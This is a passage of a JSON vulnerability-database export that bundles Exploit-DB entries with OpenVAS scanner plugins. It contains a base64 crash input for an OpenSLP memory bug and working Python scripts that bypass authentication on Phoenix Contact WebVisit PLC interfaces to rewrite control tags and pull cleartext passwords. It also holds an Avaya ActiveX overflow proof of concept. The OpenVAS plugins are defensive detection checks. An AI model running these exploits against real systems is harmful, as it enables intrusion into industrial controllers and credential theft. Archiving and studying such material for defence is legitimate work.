(slpd_main.c:699)\r\n\r\nThe while loop on line 207 fails to perform bounds checking, and as such\r\nmay end up incrementing the pointer p up to a point such that p is bigger\r\nthan ep. Thus, the third argument to memmove on line 2010 becomes negative.\r\nHowever, since memmove accepts a size_t (which is unsigned) the value wraps\r\naround and becomes UINT_MAX or close to UINT_MAX resulting in memmove\r\nattempting to move an excessive amount of memory, resulting in OOB write.\r\n\r\n 184 /** fold internal white space within a string.\r\n 185 *\r\n 186 * folds all internal white space to a single space character within a\r\n 187 * specified string. modified the @p str parameter with the result and\r\n 188 * returns the new length of the string.\r\n 189 *\r\n 190 * @param[in] len - the length in bytes of @p str.\r\n 191 * @param[in,out] str - the string from which extraneous white space\r\n 192 * should be removed.\r\n 193 *\r\n 194 * @return the new (shorter) length of @p str.\r\n 195 *\r\n 196 * @note this routine assumes that leading and trailing white space have\r\n 197 * already been removed from @p str.\r\n 198 */\r\n 199 static int slpfoldwhitespace(size_t len, char * str)\r\n 200 {\r\n 201 char * p = str, * ep = str + len;\r\n 202 while (p < ep)\r\n 203 {\r\n 204 if (isspace(*p))\r\n 205 {\r\n 206 char * ws2p = ++p; /* point ws2p to the second ws char. */\r\n 207 while (isspace(*p)) /* scan till we hit a non-ws char. */\r\n 208 p++;\r\n 209 len -= p - ws2p; /* reduce the length by extra ws. */\r\n 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */\r\n 211 }\r\n 212 p++;\r\n 213 }\r\n 214 return (int)len;\r\n 215 }\r\n\r\nProof of discovery:\r\n\r\n $ echo -n \"AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==\" | base64 -d | sha256sum\r\n 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 -\r\n\r\ntwitter.com/magnusstubman/status/938317849474555904\r\n\r\nPatch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a \r\n\r\nREFERENCES\r\n==========\r\n\r\n- sourceforge.net/p/openslp/bugs/161\r\n- sourceforge.net/p/openslp/bugs/160\r\n- twitter.com/magnusstubman/status/938317849474555904\r\n- twitter.com/magnusstubman/status/953909628622069760\r\n- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a\r\n- openwall.com/lists/oss-security/2016/09/27/4\r\n- openwall.com/lists/oss-security/2016/09/28/1", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45804"}, {"lastseen": "2018-10-12T14:30:07", "bulletinFamily": "exploit", "description": "Phoenix Contact WebVisit 2985725 - Authentication Bypass. CVE-2016-8371,CVE-2016-8380. Webapps exploit for Windows platform", "modified": "2018-10-12T00:00:00", "published": "2018-10-12T00:00:00", "id": "EDB-ID:45590", "href": "https://www.exploit-db.com/exploits/45590/", "type": "exploitdb", "title": "Phoenix Contact WebVisit 2985725 - Authentication Bypass", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 2985725 - Authentication Bypass\r\n# Date: 2018-09-30\r\n# Exploit Author: Deneut Tijl\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit (all versions)\r\n# CVE : CVE-2016-8380, CVE-2016-8371\r\n\r\n# Description\r\n# Script to read and write PLC tags via a Webvisit HMI page (even in case of a password protection)\r\n# Steps:\r\n# * Get Project Name: http://<ip>/\r\n# * Get list of tags: http://<ip>/<projectname>.tcr\r\n# * Get current values of tags: http://<ip>/cgi-bin/ILRReadValues.exe\r\n# * Set new tag values: http://<ip>/cgi-bin/writeVal.exe?<tag>+<value> (urlencode!)\r\n\r\n# CVE-2016-8380-SetPLCValues.py\r\n\r\n#! /usr/bin/env python\r\n\r\nimport urllib2\r\n\r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n\r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nstrProject = ''\r\nfor line in URLResponse.readlines():\r\n if 'ProjectName' in line:\r\n strProject = line.split('VALUE=\"')[1].split('\"')[0]\r\n\r\nif strProject == '':\r\n print('#### Error, no \\'ProjectName\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nprint('---- Found project \\'' + strProject + '\\', retrieving list of tags')\r\n\r\ntry:\r\n TagResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strProject + '.tcr'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': /' + strProject + '.tcr not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\narrTagList = []\r\nfor line in TagResponse.readlines():\r\n if line.startswith('#!-- N ='):\r\n intNumberOfTags = int(line.split('=')[1])\r\n print('---- There should be ' + str(intNumberOfTags) + ' tags:')\r\n if not line.startswith('#'):\r\n if not line.split(';')[0].strip() == '':\r\n arrTagList.append(line.split(';')[0].strip())\r\n print('-- '+line.split(';')[0].strip())\r\n\r\n\r\nraw_input('Press Enter to query them all')\r\nimport os, urllib\r\nos.system('cls' if os.name == 'nt' else 'clear')\r\nstrPost = '<body>'\r\nstrPost += '<item_list_size>' + str(len(arrTagList)) + '</item_list_size>'\r\nstrPost += '<item_list>'\r\nfor item in arrTagList:\r\n strPost += '<i><n>' + item + '</n></i>'\r\nstrPost += '</item_list></body>'\r\nDataResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/ILRReadValues.exe', strPost)).read()\r\n\r\narrData = []\r\nfor item in DataResponse.split('<i>'):\r\n if '<n>' in item:\r\n name = item.split('<n>')[1].split('</n>')[0]\r\n value = item.split('<v>')[1].split('</v>')[0]\r\n arrData.append((name,value))\r\nprint('----- Full list of tags and their values:')\r\ni = 0\r\nfor item in arrData:\r\n i += 1\r\n print(str(i) + ': Tag ' + item[0] + ' has value: ' + item[1])\r\n\r\nans1 = raw_input('Want to change a tag? Enter a number or press Enter to quit: ')\r\nif ans1 == '':\r\n exit()\r\nstrTag = arrData[int(ans1) - 1][0]\r\nstrVal = arrData[int(ans1) - 1][1]\r\nans2 = raw_input('Setting value for ' + strTag + ' [' + strVal + ']: ')\r\nif ans2 == '': ans2 = strVal\r\nurllib2.urlopen(urllib2.Request('http://' + strIP + '/cgi-bin/writeVal.exe?' + urllib.quote_plus(strTag) + '+' + str(ans2)))", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/45590/"}, {"lastseen": "2018-10-11T16:29:59", "bulletinFamily": "exploit", "description": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure. CVE-2016-8366. Webapps exploit for Hardware platform", "modified": "2018-10-11T00:00:00", "published": "2018-10-11T00:00:00", "id": "EDB-ID:45586", "href": "https://www.exploit-db.com/exploits/45586/", "type": "exploitdb", "title": "Phoenix Contact WebVisit 6.40.00 - Password Disclosure", "sourceData": "# Exploit Title: Phoenix Contact WebVisit 6.40.00 - Password Disclosure\r\n# Exploit Author: Deneut Tijl\r\n# Date: 2018-09-30\r\n# Vendor Homepage: www.phoenixcontact.com\r\n# Software Link: https://www.phoenixcontact.com/online/portal/nl/?uri=pxc-oc-itemdetail:pid=2985725&library=nlnl&pcck=P-19-05-01&tab=5\r\n# Version: WebVisit < 6.40.00\r\n# CVE: CVE-2016-8366\r\n\r\n# This script will perform retrieval of clear text credentials for a Phoenix Contact PLC with a WebVisit GUI, \r\n# password protected, application on it Tested on the Phoenix Contact ILC-390 PLC, but others are \r\n# surely equally vulnerable with WebVisit 6.40.00, the passwords are SHA256 hashes, which also will be retrieved\r\n\t\t\r\n# Sample output:\r\n# C:\\Users\\admin\\Desktop>CVE-2016-8366.py\r\n# Please enter an IP [192.168.1.200]:\r\n# This is the password for userlevel 1: pw1\r\n# This is the password for userlevel 2: SuperPass2\r\n# This is the password for userlevel 3: Extreme2TheMax3\r\n# This is the password for userlevel 4: PowerPass4\r\n# Press Enter to exit\r\n\r\n# PoC\r\n\r\n#! /usr/bin/env python\r\n\r\nimport urllib2, binascii\r\n\r\nstrIP = raw_input('Please enter an IP [192.168.1.200]: ')\r\nif strIP == '': strIP = '192.168.1.200'\r\n\r\ntry:\r\n URLResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/'))\r\nexcept urllib2.HTTPError:\r\n print('#### Critical Error with IP ' + strIP + ': no response')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\nstrMainTEQ = ''\r\nfor line in URLResponse.readlines():\r\n if 'MainTEQName' in line:\r\n strMainTEQ = line.split('VALUE=\"')[1].split('\"')[0]\r\n\r\nif strMainTEQ == '':\r\n print('#### Error, no \\'MainTEQ\\' found on the main page')\r\n raw_input('Press Enter to exit')\r\n exit()\r\n\r\ntry:\r\n LoginTeqResponse = urllib2.urlopen(urllib2.Request('http://' + strIP + '/' + strMainTEQ))\r\nexcept urllib2.HTTPError:\r\n print('Critical Error with IP ' + strIP + ': File \\'' + strMainTEQ + '\\' not found')\r\n raw_input('Press Enter to exit')\r\n exit()\r\nstrAlldata = ''\r\nfor line in LoginTeqResponse.readlines():\r\n strAlldata += binascii.hexlify(line)\r\n\r\n## For vulnerable webvisit:\r\n## Seems to be 'userLevel' + x bytes + 1 + y bytes + 'password'\r\n## userLevel + '0506030001' + 31 + '00030003010301068300' + passlength + 'password'\r\n## For WebVisit > 6.40.00\r\n## userLevel + '0003000301030b06830040' + 'SHA256' (wich is 64 bytes)\r\n\r\narrData = strAlldata.split('757365724c6576656c0506030001') ## userLevel + '0506030001'\r\nfor item in arrData:\r\n if '00030003010301068300' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16) ## Turn str '31' into int 1\r\n strPassLength = item.split('00030003010301068300')[1][:2]\r\n strPassword = binascii.unhexlify(item.split('00030003010301068300')[1][2:2+(2*int(strPassLength,16))])\r\n print('This is the password for userlevel ' + str(intUserlevel) + ': ' + strPassword)\r\n elif '0003000301030b06830040' in item:\r\n intUserlevel = int(binascii.unhexlify(item[:2]), 16)\r\n strHash = binascii.unhexlify(item.split('0003000301030b06830040')[1][:64*2])\r\n print('This is the hash for userlevel ' + str(intUserlevel) + ': ' + strHash.lower())\r\nraw_input('Press Enter to exit')", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/45586/"}, {"lastseen": "2017-11-06T14:31:53", "bulletinFamily": "exploit", "description": "Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow. CVE-2017-12969. Dos exploit for Windows platform", "modified": "2017-11-05T00:00:00", "published": "2017-11-05T00:00:00", "id": "EDB-ID:43120", "href": "https://www.exploit-db.com/exploits/43120/", "type": "exploitdb", "title": "Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow", "sourceData": "[+] Credits: John Page (aka hyp3rlinx)\t\r\n[+] Website: hyp3rlinx.altervista.org\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-OFFICE-IP-(IPO)-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt\r\n[+] ISR: ApparitionSec \r\n \r\n\r\n\r\nVendor:\r\n=============\r\nwww.avaya.com\r\n\r\n\r\n\r\nProduct:\r\n===========\r\nAvaya IP Office (IPO) \r\nv9.1.0 - 10.1\r\n\r\nIP Office is Avaya's global midsize solution for enterprises, supporting up to 3,000 users at a single location with IP Office Select editions.\r\nFor businesses with multiple locations, IP Office provides a powerful set of tools to help streamline operations, centralize management, and\r\nreduce total cost of ownership for converged networks. Using industry standards, IP Office enables companies to share resources, provide\r\nimproved customer service, and keep mobile employees accessible.\r\n\r\nProvides a hybrid PBX with TDM and IP telephony and trunk support.\r\nProvides IP routing, switching and firewall protection, between LAN and WAN (LAN2).\r\n\r\nIn addition to basic telephony services and voicemail, IP Office offers both hard phone and soft phone options.\r\nIncludes a robust set of tools for administration (Manager), call tracking (SMDR), and system monitoring and diagnostics (System Status Application).\r\n\r\nAvailable editions: Basic, Essential, Preferred, Server, Server Select, Server with Virtualized Software, Server/Sever Select hosted in the Cloud.\r\n\r\n\r\n\r\nVulnerability Type:\r\n====================\r\nActiveX Remote Buffer Overflow\r\n\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nCVE-2017-12969\r\nASA-2017-313\r\n\r\n\r\n\r\nSecurity Issue:\r\n================\r\nViewerCtrl.ocx ActiveX Component used by Avaya IP Office (IPO) can be exploited by remote attackers to potentially execute arbitrary\r\nattacker supplied code. User would have to visit a malicious webpage using InternetExplorer where the exploit could be triggered.\r\n\r\nClsid: {27F12EFD-325D-4907-A2D2-C38A2B6D3334}\r\nSafe for Script: False\r\nSafe for Init: False\r\n\r\nACCESS_VIOLATION\r\n8C4A77 MOV EAX,[ECX]\r\n\r\nSEH Chain:\r\n-----------\r\n1 8D00A3 po.dll\r\n2 36A7E95 CIPElements.dll\r\n3 36A8115 CIPElements.dll\r\n4 788719 ViewerCtrl.OCX\r\n5 788533 ViewerCtrl.OCX\r\n6 78862A ViewerCtrl.OCX\r\n7 6008793E mfc90u.dll\r\n8 60089B31 mfc90u.dll\r\n9 779858C5 ntdll.dll\r\n\r\n\r\n(d360.1040c): Access violation - code c0000005 (first/second chance not available)\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for ntdll.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for po.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for CIPElements.dll - \r\neax=0608ec18 ebx=00000000 ecx=00000000 edx=00000000 esi=0aa7bdd0 edi=0aa7bdd0\r\neip=06064a77 esp=03535c78 ebp=03535db0 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246\r\npo!cip::po::SpecialObjects::getPresetObject+0x77:\r\n06064a77 8b01 mov eax,dword ptr [ecx] ds:002b:00000000=????????\r\n0:008> !load winext/msec\r\n0:008> !exploitable\r\n\r\n!exploitable 1.6.0.0\r\n*** ERROR: Module load completed but symbols could not be loaded for mfc90u.dll\r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for mshtml.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for user32.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for ieframe.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for iertutil.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for IEShims.dll - \r\n*** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - \r\n\r\nExploitability Classification: PROBABLY_EXPLOITABLE\r\n\r\nRecommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at \r\npo!cip::po::SpecialObjects::getPresetObject+0x0000000000000077 (Hash=0x6f1f914b.0xc46b7285)\r\n\r\nThe data from the faulting address is later used as the target for a branch.\r\n\r\n\r\nReferences:\r\n==============\r\nhttps://downloads.avaya.com/css/P8/documents/101044091\r\n\r\n\r\nExploit/POC:\r\n=============\r\n\r\n<object classid='clsid:27F12EFD-325D-4907-A2D2-C38A2B6D3334' id='victim' />\r\n\r\n<script language='vbscript'>\r\nvictimFile = \"C:\\Program Files (x86)\\Avaya\\IP Office Contact Center\\User Interface\\ViewerCtrl.ocx\"\r\nprototype = \"Function open ( ByVal containerId As String ) As Long\"\r\nmemberName = \"open\"\r\nprogid = \"ViewerCtrlLib.ViewerCtrl\"\r\nargCount = 1\r\npayload=String(5142, \"A\")\r\n\r\nvictim.open payload\r\n\r\n</script>\r\n\r\n\r\nNetwork Access:\r\n===============\r\nRemote\r\n\r\n\r\n\r\n\r\nSeverity:\r\n=========\r\nHigh\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n=============================\r\nVendor Notification: July 12, 2017\r\nVendor acknowlegement: July 14, 2017\r\nCVE assigned by mitre : August 19, 2017\r\nVendor advisory : November 4, 2017\r\nNovember 5, 2017 : Public Disclosure\r\n\r\n\r\n\r\n[+] Disclaimer\r\nThe information contained within this advisory is supplied \"as-is\" with no warranties or guarantees of fitness of use or otherwise.\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and\r\nthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit\r\nis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility\r\nfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information\r\nor exploits by the author or elsewhere. All content (c).\r\n\r\nhyp3rlinx", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43120/"}], "openvas": [{"lastseen": "2019-05-03T14:25:39", "bulletinFamily": "scanner", "description": "This host is missing a critical security\n update according to Microsoft KB4457129", "modified": "2019-05-03T00:00:00", "published": "2018-09-12T00:00:00", "id": "OPENVAS:1361412562310814003", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814003", "title": "Microsoft Windows Multiple Vulnerabilities (KB4457129)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4457129)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814003\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2018-5391\", \"CVE-2018-8271\", \"CVE-2018-8315\", \"CVE-2018-8332\",\n \"CVE-2018-8335\", \"CVE-2018-8392\", \"CVE-2018-8393\", \"CVE-2018-8410\",\n \"CVE-2018-8419\", \"CVE-2018-8420\", \"CVE-2018-8424\", \"CVE-2018-8433\",\n \"CVE-2018-8434\", \"CVE-2018-8438\", \"CVE-2018-8439\", \"CVE-2018-8440\",\n \"CVE-2018-8442\", \"CVE-2018-8443\", \"CVE-2018-8444\", \"CVE-2018-8446\",\n \"CVE-2018-8447\", \"CVE-2018-8452\", \"CVE-2018-8455\", \"CVE-2018-8457\",\n \"CVE-2018-8468\", \"CVE-2018-8470\", \"CVE-2018-8475\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-09-12 10:20:08 +0530 (Wed, 12 Sep 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4457129)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4457129\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to,\n\n - Denial of service vulnerability (named 'FragmentSmack').\n\n - Windows bowser.sys kernel-mode driver fails to properly handle objects\n in memory.\n\n - Browser scripting engine improperly handle object types.\n\n - Windows font library improperly handles specially crafted embedded fonts.\n\n - SMB improperly handles specially crafted client requests.\n\n - Microsoft JET Database Engine improperly handles objects in memory.\n\n - Windows Kernel API improperly handles registry objects in memory.\n\n - Windows kernel fails to properly initialize a memory address.\n\n - Microsoft XML Core Services improperly MSXML parser processes user input.\n\n - Windows GDI component improperly discloses the contents of its memory.\n\n - Windows Graphics component improperly handles objects in memory.\n\n - Hyper-V improperly validates guest operating system user input.\n\n - Windows improperly handles calls to Advanced Local Procedure Call (ALPC).\n\n - Windows kernel improperly handles objects in memory.\n\n - Microsoft Server Message Block 2.0 (SMBv2) server improperly handles certain\n requests.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Scripting engine does not properly handle objects in memory in Microsoft browsers.\n\n - Windows improperly parses files.\n\n - Internet Explorer improperly handles script.\n\n - Windows does not properly handle specially crafted image files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code in the context of the current user, obtain information\n to further compromise the user's system, gain elevated privileges on a targeted\n system and also cause the affected system to crash.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8.1 for 32-bit/x64.\n\n Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4457129\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"urlmon.dll\");\nif(!fileVer){\n exit(0);\n}\n\nif(version_is_less(version:fileVer, test_version:\"11.0.9600.19130\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\urlmon.dll\",\n file_version:fileVer, vulnerable_range:\"Less than 11.0.9600.19130\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T15:09:38", "bulletinFamily": "scanner", "description": "The script tries to detect Windows ", "modified": "2019-02-20T00:00:00", "published": "2018-03-23T00:00:00", "id": "OPENVAS:1361412562310107303", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310107303", "title": "Microsoft Windows Unquoted Path Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_unquoted_path_vulnerabilities_win.nasl 13783 2019-02-20 11:12:24Z cfischer $\n#\n# Microsoft Windows Unquoted Path Vulnerability\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n# Michael Martin <michael.martin@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.107303\");\n script_version(\"$Revision: 13783 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-20 12:12:24 +0100 (Wed, 20 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-23 08:14:54 +0100 (Fri, 23 Mar 2018)\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_name(\"Microsoft Windows Unquoted Path Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows\");\n script_dependencies(\"smb_registry_access.nasl\", \"gb_wmi_access.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB_or_WMI/access_successful\");\n script_cve_id(\"CVE-2013-1609\", \"CVE-2014-0759\", \"CVE-2014-5455\", \"CVE-2018-6321\", \"CVE-2018-6016\",\n \"CVE-2018-6384\", \"CVE-2017-14019\", \"CVE-2016-6803\", \"CVE-2017-12730\", \"CVE-2017-9644\",\n \"CVE-2017-9247\", \"CVE-2017-3005\", \"CVE-2017-5873\", \"CVE-2016-8769\", \"CVE-2016-9356\",\n \"CVE-2016-7165\", \"CVE-2012-4350\", \"CVE-2013-1092\", \"CVE-2013-2176\", \"CVE-2013-1610\",\n \"CVE-2013-2231\", \"CVE-2013-6182\", \"CVE-2013-2151\", \"CVE-2013-2152\", \"CVE-2013-5011\",\n \"CVE-2009-2761\", \"CVE-2014-4634\", \"CVE-2015-0884\", \"CVE-2015-2789\", \"CVE-2015-1484\",\n \"CVE-2015-3987\", \"CVE-2015-4173\", \"CVE-2014-9646\", \"CVE-2015-7866\", \"CVE-2015-8156\",\n \"CVE-2016-4158\", \"CVE-2016-5793\", \"CVE-2016-6935\", \"CVE-2017-1000475\", \"CVE-2017-14030\",\n \"CVE-2017-15383\", \"CVE-2017-3757\", \"CVE-2017-3756\", \"CVE-2017-3751\", \"CVE-2017-6005\",\n \"CVE-2017-7180\", \"CVE-2016-8225\", \"CVE-2016-8102\", \"CVE-2016-3161\", \"CVE-2016-5852\",\n \"CVE-2013-0513\", \"CVE-2018-2406\", \"CVE-2018-5470\", \"CVE-2015-8988\", \"CVE-2018-0594\",\n \"CVE-2018-0595\");\n\n script_xref(name:\"URL\", value:\"https://gallery.technet.microsoft.com/scriptcenter/Windows-Unquoted-Service-190f0341#content\");\n script_xref(name:\"URL\", value:\"http://www.ryanandjeffshow.com/blog/2013/04/11/powershell-fixing-unquoted-service-paths-complete/\");\n script_xref(name:\"URL\", value:\"https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/srd/2018/04/04/triaging-a-dll-planting-vulnerability\");\n\n script_tag(name:\"summary\", value:\"The script tries to detect Windows 'Uninstall' registry entries and 'Services' using an\n unquoted path containing at least one whitespace.\");\n\n script_tag(name:\"insight\", value:\"If the path contains spaces and is not surrounded by quotation marks, the Windows API has to guess where to find\n the referenced program. If e.g. a service is using the following unquoted path:\n\n C:\\Program Files\\Folder\\service.exe\n\n then a start of the service would first try to run:\n\n C:\\Program.exe\n\n and if not found:\n\n C:\\Program Files\\Folder\\service.exe\n\n afterwards. In this example the behavior allows a local attacker with low privileges and write permissions on C:\\ to place a malicious Program.exe which is then\n executed on a service/host restart or during the uninstallation of a software.\n\n NOTE: Currently only 'Services' using an unquoted path are reported as a vulnerability. The 'Uninstall' vulnerability requires an Administrator / User\n to actively uninstall the affected software to trigger this vulnerability.\");\n\n script_tag(name:\"impact\", value:\"A local attacker could gain elevated privileges by inserting an executable file in the path of the affected service or uninstall entry.\");\n\n script_tag(name:\"affected\", value:\"Windows software installing an 'Uninstall' registry entriy or 'Service' using an unquoted path containing at least one whitespace.\");\n\n script_tag(name:\"solution\", value:\"Either put the listed vulnerable paths in quotation by manually using the onboard Registry editor or contact your vendor to get an update\n for the specified software that fixes this vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n script_tag(name:\"qod_type\", value:\"registry\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_smb_func.inc\");\n\ninfos = kb_smb_wmi_connectinfo();\nif( ! infos ) exit( 0 );\n\n# Only try accessing via WMI if we know it is working / possible\nif( get_kb_item( \"WMI/access_successful\" ) ) {\n\n handle = wmi_connect( host:infos[\"host\"], username:infos[\"username_wmi_smb\"], password:infos[\"password\"] );\n\n if( handle ) {\n\n # nb: Make sure to update the foreach loop below if adding new fields here\n query = \"SELECT DisplayName, Name, PathName FROM Win32_Service WHERE NOT PathName LIKE '%c:\\\\windows\\\\System32%' AND PathName LIKE '% %'\";\n services = wmi_query( wmi_handle:handle, query:query );\n wmi_close( wmi_handle:handle );\n if( services ) {\n\n services_list = split( services, keep:FALSE );\n\n foreach service( services_list ) {\n\n if( service == \"DisplayName|Name|PathName\" )\n continue; # nb: Just ignoring the header, make sure to update this if you add additional fields to the WMI query above\n\n service_split = split( service, sep:\"|\", keep:FALSE 